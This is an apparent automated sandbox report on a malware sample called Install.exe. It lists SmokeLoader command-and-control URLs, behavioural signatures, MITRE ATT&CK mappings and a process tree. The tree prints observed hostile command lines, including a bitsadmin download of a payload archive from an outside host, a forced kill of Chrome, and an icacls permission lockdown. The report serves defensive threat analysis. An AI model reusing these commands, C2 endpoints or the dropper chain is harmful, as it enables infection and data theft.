Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    239s
  • max time network
    245s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    26-04-2021 05:25

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://al-commandoz.com/upload/

http://antalya-belek.com/upload/

http://luxurysv.com/upload/

http://massagespijkenisse.com/upload/

http://rexgorellhondaevent.com/upload/

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 34 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:872
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:12216
    • C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1820
      • C:\Users\Admin\AppData\Local\Temp\is-2FL2K.tmp\Install.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-2FL2K.tmp\Install.tmp" /SL5="$9015C,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Users\Admin\AppData\Local\Temp\is-2H62P.tmp\Ultra.exe
          "C:\Users\Admin\AppData\Local\Temp\is-2H62P.tmp\Ultra.exe" /S /UID=burnerch1
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:856
          • C:\Program Files\Windows Journal\QUSKYVRVPE\ultramediaburner.exe
            "C:\Program Files\Windows Journal\QUSKYVRVPE\ultramediaburner.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:960
            • C:\Users\Admin\AppData\Local\Temp\is-2DBDE.tmp\ultramediaburner.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-2DBDE.tmp\ultramediaburner.tmp" /SL5="$6012E,281924,62464,C:\Program Files\Windows Journal\QUSKYVRVPE\ultramediaburner.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:296
              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                PID:1316
          • C:\Users\Admin\AppData\Local\Temp\c4-0ec3b-bfa-a37b6-54148ee9a7aab\ZHyxuteshyda.exe
            "C:\Users\Admin\AppData\Local\Temp\c4-0ec3b-bfa-a37b6-54148ee9a7aab\ZHyxuteshyda.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1940
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1784
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1784 CREDAT:275457 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1496
          • C:\Users\Admin\AppData\Local\Temp\c1-2fae4-caa-86c91-7f9a8a9c11b3e\Lowituwiba.exe
            "C:\Users\Admin\AppData\Local\Temp\c1-2fae4-caa-86c91-7f9a8a9c11b3e\Lowituwiba.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:616
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sowkk4gz.tvp\instEU.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:9808
              • C:\Users\Admin\AppData\Local\Temp\sowkk4gz.tvp\instEU.exe
                C:\Users\Admin\AppData\Local\Temp\sowkk4gz.tvp\instEU.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:9960
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qtffrimy.x42\google-game.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:11912
              • C:\Users\Admin\AppData\Local\Temp\qtffrimy.x42\google-game.exe
                C:\Users\Admin\AppData\Local\Temp\qtffrimy.x42\google-game.exe
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:11972
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  7⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:12036
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x0zgizdd.ktt\md1_1eaf.exe & exit
              5⤵
                PID:12372
                • C:\Users\Admin\AppData\Local\Temp\x0zgizdd.ktt\md1_1eaf.exe
                  C:\Users\Admin\AppData\Local\Temp\x0zgizdd.ktt\md1_1eaf.exe
                  6⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:12440
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0jercqp.csi\askinstall39.exe & exit
                5⤵
                  PID:2660
                  • C:\Users\Admin\AppData\Local\Temp\j0jercqp.csi\askinstall39.exe
                    C:\Users\Admin\AppData\Local\Temp\j0jercqp.csi\askinstall39.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3016
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      7⤵
                        PID:5448
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          8⤵
                          • Kills process with taskkill
                          PID:5588
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\omidp2ew.m1q\inst.exe & exit
                    5⤵
                      PID:5172
                      • C:\Users\Admin\AppData\Local\Temp\omidp2ew.m1q\inst.exe
                        C:\Users\Admin\AppData\Local\Temp\omidp2ew.m1q\inst.exe
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:5324
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pblexlpg.xxw\SunLabsPlayer.exe /S & exit
                      5⤵
                        PID:5572
                        • C:\Users\Admin\AppData\Local\Temp\pblexlpg.xxw\SunLabsPlayer.exe
                          C:\Users\Admin\AppData\Local\Temp\pblexlpg.xxw\SunLabsPlayer.exe /S
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:7672
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                            7⤵
                              PID:8088
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                              7⤵
                                PID:8896
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                7⤵
                                • Drops file in Program Files directory
                                PID:9268
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                7⤵
                                • Drops file in Program Files directory
                                PID:9548
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                7⤵
                                  PID:9804
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                  7⤵
                                  • Drops file in Program Files directory
                                  PID:9932
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                  7⤵
                                  • Checks for any installed AV software in registry
                                  PID:10104
                                • C:\Windows\SysWOW64\bitsadmin.exe
                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                  7⤵
                                  • Download via BitsAdmin
                                  PID:10236
                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pkMJyZMVh3DzPhiu -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:12012
                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -puf2MfOCmKMwnJRv -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:12124
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                  7⤵
                                    PID:12296
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                    7⤵
                                      PID:12396
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                      7⤵
                                        PID:12472
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                        7⤵
                                          PID:12968
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                          7⤵
                                            PID:13164
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HqzugnfW\HqzugnfW.dll" HqzugnfW
                                            7⤵
                                            • Loads dropped DLL
                                            PID:4588
                                            • C:\Windows\system32\rundll32.exe
                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HqzugnfW\HqzugnfW.dll" HqzugnfW
                                              8⤵
                                              • Loads dropped DLL
                                              • Drops file in System32 directory
                                              PID:4624
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                            7⤵
                                              PID:4716
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5020
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:2300
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:2388
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn93B9.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:2844
                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:3108
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mivlwsbu.4bw\GcleanerWW.exe /mixone & exit
                                                  5⤵
                                                    PID:7660
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gerhntxx.aak\toolspab1.exe & exit
                                                    5⤵
                                                      PID:7760
                                                      • C:\Users\Admin\AppData\Local\Temp\gerhntxx.aak\toolspab1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\gerhntxx.aak\toolspab1.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:7800
                                                        • C:\Users\Admin\AppData\Local\Temp\gerhntxx.aak\toolspab1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\gerhntxx.aak\toolspab1.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:8036
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3h2tszdc.aqx\c7ae36fa.exe & exit
                                                      5⤵
                                                        PID:7828
                                                        • C:\Users\Admin\AppData\Local\Temp\3h2tszdc.aqx\c7ae36fa.exe
                                                          C:\Users\Admin\AppData\Local\Temp\3h2tszdc.aqx\c7ae36fa.exe
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:7860
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bweeu13g.5zt\app.exe /8-2222 & exit
                                                        5⤵
                                                          PID:7884
                                                          • C:\Users\Admin\AppData\Local\Temp\bweeu13g.5zt\app.exe
                                                            C:\Users\Admin\AppData\Local\Temp\bweeu13g.5zt\app.exe /8-2222
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            PID:7928
                                                            • C:\Users\Admin\AppData\Local\Temp\bweeu13g.5zt\app.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\bweeu13g.5zt\app.exe" /8-2222
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Modifies data under HKEY_USERS
                                                              PID:8532
                                                • C:\Users\Admin\AppData\Local\Temp\931B.exe
                                                  C:\Users\Admin\AppData\Local\Temp\931B.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3996
                                                • C:\Users\Admin\AppData\Local\Temp\951F.exe
                                                  C:\Users\Admin\AppData\Local\Temp\951F.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:4020
                                                • C:\Users\Admin\AppData\Local\Temp\A556.exe
                                                  C:\Users\Admin\AppData\Local\Temp\A556.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:4436
                                                • C:\Users\Admin\AppData\Local\Temp\B925.exe
                                                  C:\Users\Admin\AppData\Local\Temp\B925.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  PID:5424
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls "C:\Users\Admin\AppData\Local\a91986d2-9377-4c75-b5ac-481f53965375" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                    2⤵
                                                    • Modifies file permissions
                                                    PID:5800
                                                  • C:\Users\Admin\AppData\Local\Temp\B925.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\B925.exe" --Admin IsNotAutoStart IsNotTask
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:5848
                                                • C:\Users\Admin\AppData\Local\Temp\C8CF.exe
                                                  C:\Users\Admin\AppData\Local\Temp\C8CF.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Writes to the Master Boot Record (MBR)
                                                  PID:5224
                                                • C:\Users\Admin\AppData\Local\Temp\CB02.exe
                                                  C:\Users\Admin\AppData\Local\Temp\CB02.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:5344
                                                  • C:\Users\Admin\AppData\Roaming\IrfanViewStreamer\IVStreamer.exe
                                                    C:\Users\Admin\AppData\Roaming\IrfanViewStreamer\IVStreamer.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:5556
                                                • C:\Users\Admin\AppData\Local\Temp\D974.exe
                                                  C:\Users\Admin\AppData\Local\Temp\D974.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:5828
                                                • C:\Users\Admin\AppData\Local\Temp\E345.exe
                                                  C:\Users\Admin\AppData\Local\Temp\E345.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:5776
                                                • C:\Users\Admin\AppData\Local\Temp\FCED.exe
                                                  C:\Users\Admin\AppData\Local\Temp\FCED.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:5936
                                                • C:\Users\Admin\AppData\Local\Temp\603.exe
                                                  C:\Users\Admin\AppData\Local\Temp\603.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:6060
                                                  • C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                    C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:6184
                                                • C:\Windows\SysWOW64\explorer.exe
                                                  C:\Windows\SysWOW64\explorer.exe
                                                  1⤵
                                                    PID:6200
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe
                                                    1⤵
                                                      PID:6388

                                                    Network

                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                    Persistence

                                                    Registry Run Keys / Startup Folder

                                                    1
                                                    T1060

                                                    Bootkit

                                                    1
                                                    T1067

                                                    BITS Jobs

                                                    1
                                                    T1197

                                                    Defense Evasion

                                                    File Permissions Modification

                                                    1
                                                    T1222

                                                    Modify Registry

                                                    3
                                                    T1112

                                                    BITS Jobs

                                                    1
                                                    T1197

                                                    Install Root Certificate

                                                    1
                                                    T1130

                                                    Credential Access

                                                    Credentials in Files

                                                    1
                                                    T1081

                                                    Discovery

                                                    Software Discovery

                                                    1
                                                    T1518

                                                    Security Software Discovery

                                                    1
                                                    T1063

                                                    Query Registry

                                                    3
                                                    T1012

                                                    System Information Discovery

                                                    3
                                                    T1082

                                                    Peripheral Device Discovery

                                                    1
                                                    T1120

                                                    Collection

                                                    Data from Local System

                                                    1
                                                    T1005

                                                    Command and Control

                                                    Web Service

                                                    1
                                                    T1102

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                      MD5

                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                      SHA1

                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                      SHA256

                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                      SHA512

                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                      MD5

                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                      SHA1

                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                      SHA256

                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                      SHA512

                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                    • C:\Program Files\Windows Journal\QUSKYVRVPE\ultramediaburner.exe
                                                      MD5

                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                      SHA1

                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                      SHA256

                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                      SHA512

                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                    • C:\Program Files\Windows Journal\QUSKYVRVPE\ultramediaburner.exe
                                                      MD5

                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                      SHA1

                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                      SHA256

                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                      SHA512

                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                    • C:\Program Files\install.dat
                                                      MD5

                                                      31e4a5735b20be6a53cbb552663b1cc3

                                                      SHA1

                                                      c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                      SHA256

                                                      b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                      SHA512

                                                      3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                    • C:\Program Files\install.dll
                                                      MD5

                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                      SHA1

                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                      SHA256

                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                      SHA512

                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                      MD5

                                                      2d48d6276966926a4e12e4b8a3be1e07

                                                      SHA1

                                                      e4e09ae5f90e0f3f8fe22a3890d5cf8ad1d11df7

                                                      SHA256

                                                      d44edf9a704b80c356956549ab529a17437ee628cd1b7614c66f12423c64202f

                                                      SHA512

                                                      1b8489746c62d15e7c2de3df0effa72d2b4bcba9b5f931aea2044a2257596d13a0097b9d42d6393e382191f314de5bc68a04bbae30fab95b3b43dfc3987b237f

                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                      MD5

                                                      150dc77abd9c8c178eaeb023813ce109

                                                      SHA1

                                                      eb9af0b86f1f939b705c0096f8e9809fd91b2f9a

                                                      SHA256

                                                      a89808675d21153e04cb77de2d4748cb5ca87a00d3fe7ba99ff6151b526bc97c

                                                      SHA512

                                                      15297bf0fcd0a658886339c425a2136afe17721a025c202bb9ae79902b908bfd180eb7152db4c979c40679aee9af4e42e03504bd8c8726cead23de9eea3744b8

